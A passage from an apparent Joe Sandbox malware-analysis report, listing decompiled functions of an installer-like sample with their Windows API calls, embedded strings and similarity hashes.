• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: AddressHandleModuleProcProcessThreadWindow
• String ID: AllowSetForegroundWindow$user32.dll
• API String ID: 1782028327-3855017861
• Opcode ID: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
• Instruction ID: 0cf89beef61ef8a76223fb5aa8394d6e95b25c45a6fd57a36df02fca6db0c00c
• Opcode Fuzzy Hash: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
• Instruction Fuzzy Hash: 79D0A9E0200F0169DD10B3F2AD47EAB329ECE84B10B92843B7408E3182CA3DE8404E3C
APIs
• GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
Strings
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: NotifyWinEvent$dD$user32.dll
• API String ID: 1646373207-754903266
• Opcode ID: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
• Instruction ID: d2dc615c88fd328006faf79361cd74abdd3d8da8a377be2bcafca06377aa3dce
• Opcode Fuzzy Hash: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
• Instruction Fuzzy Hash: 37E012F0E41340AEFB00BFFB984271A3AA0B76431CB00007FB40066292CB7C48284A5F
APIs
• BeginPaint.USER32(00000000,?), ref: 00416C62
• SaveDC.GDI32(?), ref: 00416C93
• ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
• RestoreDC.GDI32(?,?), ref: 00416D1B
• EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Paint$BeginClipExcludeRectRestoreSave
• String ID:
• API String ID: 3808407030-0
• Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
• Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
• Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
• Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58
APIs
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
• Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
• Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
• Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
APIs
• SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
• SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
• SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
• SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
• SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
• Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
• Opcode Fuzzy Hash: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
• Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
APIs
• GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
• GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
• 73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
• 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
• DeleteObject.GDI32(00000000), ref: 0041BCAA
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: MetricsSystem$A26310A570DeleteObject
• String ID:
• API String ID: 4277397052-0
• Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
• Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
• Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
• Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
APIs
  • Part of subcall function 0045C76C: SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
• GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
• GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
Strings
• Failed to set permissions on registry key (%d)., xrefs: 00472610
• Could not set permissions on the registry key because it currently does not exist., xrefs: 004725F3
• Setting permissions on registry key: %s\%s, xrefs: 004725AE
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: ErrorLast
• String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
• API String ID: 1452528299-4018462623
• Opcode ID: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
• Instruction ID: 4334e49d385bf692f2cc32478bc4a2497c1f2fe716dd62bcd395c3eafaa3e5f2
• Opcode Fuzzy Hash: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
• Instruction Fuzzy Hash: 9C218370A046445FCB01DBAAD9827EEBBE4EB49314F50817BE408E7392D7B85D05CBA9
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
• SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
• SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocString
• String ID:
• API String ID: 262959230-0
• Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
• Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
• Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
• Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
APIs
• 73A18830.GDI32(00000000,00000000,00000000), ref: 00414429
• 73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
• 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
• 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
• 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: A122A18830$A480
• String ID:
• API String ID: 3325508737-0
• Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
• Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
• Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
• Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
APIs
• WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
• WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
• WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
Strings
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Enum$NameOpenResourceUniversal
• String ID: Z
• API String ID: 3604996873-1505515367
• Opcode ID: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
• Instruction ID: 2d8f00a968b5306eb49df96258ffff6df6a72a1db963417fd4edcb7bb2ad48f8
• Opcode Fuzzy Hash: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
• Instruction Fuzzy Hash: C1513070E04208ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE458F5A
APIs
• SetRectEmpty.USER32(?), ref: 0044C8A2
• DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C8CD
• DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C955
Strings
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: DrawText$EmptyRect
• String ID:
• API String ID: 182455014-2867612384
• Opcode ID: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
• Instruction ID: 68feaf95479c8b0f8d19ac4d8bed049c81d0e9902cdc902b6301711e3864cdc7
• Opcode Fuzzy Hash: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
• Instruction Fuzzy Hash: 435152B0A01248AFDB50DFA5C885BDEBBF8FF49304F08447AE845EB251D7789944CB64
APIs
• 73A1A570.USER32(00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EE12
  • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
• SelectObject.GDI32(?,00000000), ref: 0042EE35
• 73A1A480.USER32(00000000,?,0042EF21,00000000,0042EF1A,?,00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000), ref: 0042EF14
Strings
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: A480A570CreateFontIndirectObjectSelect
• String ID: ...\
• API String ID: 2998766281-983595016
• Opcode ID: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
• Instruction ID: f7e46b9156472dd3d3dfb1d2a9ceb23c9820bf6754630174aa29599cfb354949
• Opcode Fuzzy Hash: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
• Instruction Fuzzy Hash: E0318170B00128ABDF11EF9AD841BAEB7B9EB48308F91447BF410A7291D7785D45CA69
APIs
• ShellExecuteEx.SHELL32(0000003C), ref: 00454848
• GetLastError.KERNEL32(0000003C,00000000,00454891,?,?,?), ref: 00454859
  • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
Strings
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: DirectoryErrorExecuteLastShellSystem
• String ID: <$SuG
• API String ID: 893404051-1504269210
• Opcode ID: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
• Instruction ID: e58c708146c2f721f38e64faa2aac8e88425893723770a95bfdd45a03fe75b0c
• Opcode Fuzzy Hash: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
• Instruction Fuzzy Hash: 7D218574A00249ABDB10EF65C88269E7BE8EF49349F50403AF844EB381D7789D498B98
APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
• ExitProcess.KERNEL32 ref: 00404E0D
Strings
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: ExitMessageProcess
• String ID: Error$Runtime error at 00000000
• API String ID: 1220098344-2970929446
• Opcode ID: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
• Instruction ID: 7c754c0b660761a5bc1c63aadfae0e1dd2c0c13e95eab211716155318e46cc07
• Opcode Fuzzy Hash: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
• Instruction Fuzzy Hash: E421CB606442514ADB11AB799C857163B9197E534CF04817BE700B73F2CA7D9C64C7EF
                                                                              APIs
                                                                                • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                              • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00455E48
                                                                              • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00455E75
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                              • String ID: LoadTypeLib$RegisterTypeLib
                                                                              • API String ID: 1312246647-2435364021
                                                                              • Opcode ID: ff476844371f4104c378b253a494915691f6bbf47305687bf7563dfe30fd17cc
                                                                              • Instruction ID: e41936e4c8b07abfc49a8f10cd7ccd4a21eee7bf761b45698a75813e6285fe04
                                                                              • Instruction Fuzzy Hash: 59119631B00A04AFDB11DFA6CD62A5FB7ADEB89705F10847ABC04D3652DB789E04CA54
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456366
                                                                              • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00456403
                                                                              Strings
                                                                              • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456392
                                                                              • Failed to create DebugClientWnd, xrefs: 004563CC
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                              • API String ID: 3850602802-3720027226
                                                                              • Opcode ID: c69c87a4a610bb2d85408e1b555d6f8d603e272f230d3717a3ecef290dd31cb1
                                                                              • Instruction ID: 9b4fe9b07e62f64c95e3ed8797323406b80950c852a807cd7dd65319169fa691
                                                                              • Instruction Fuzzy Hash: 1111E3B06042506FD300AB699C81B5F7BA89B56309F45443BF984DF383D3798C18CBAE
                                                                              APIs
                                                                                • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                              • GetFocus.USER32 ref: 004771FF
                                                                              • GetKeyState.USER32(0000007A), ref: 00477211
                                                                              • WaitMessage.USER32(?,00000000,00477238,?,00000000,0047725F,?,?,00000001,00000000,?,?,?,0047E9E6,00000000,0047F8E7), ref: 0047721B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FocusMessageStateTextWaitWindow
                                                                              • String ID: Wnd=$%x
                                                                              • API String ID: 1381870634-2927251529
                                                                              • Opcode ID: 4a336d0fab4478f12607185930d67efd8132ed5f698f2504fd14852207cbbe6e
                                                                              • Instruction ID: 1bcd60996d2698ed373ebf422e897d28d135c5275452f214efeb8338eb806bda
                                                                              • Instruction Fuzzy Hash: A611CA30604204AFC701EFA9DC41ADE77F8EB49704B9184F6F418E3252D73C6D10CA6A
                                                                              APIs
                                                                              • FileTimeToLocalFileTime.KERNEL32(000000FF), ref: 0046D640
                                                                              • FileTimeToSystemTime.KERNEL32(?,?,000000FF), ref: 0046D64F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Time$File$LocalSystem
                                                                              • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                              • API String ID: 1748579591-1013271723
                                                                              • Opcode ID: 52d5e1154cf982ec1ea5d8ce260032eaa3f1648937a562aafe09eebef1c1682c
                                                                              • Instruction ID: 0ff0b3c23c5ed0256b313d7d525d52e9a24b5728abf6314cf281cf193483f13b
                                                                              • Instruction Fuzzy Hash: 4311F8A090C3909ED340DF2AC44432BBAE4AB89704F04892EF9D8D6381E779C948DB77
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
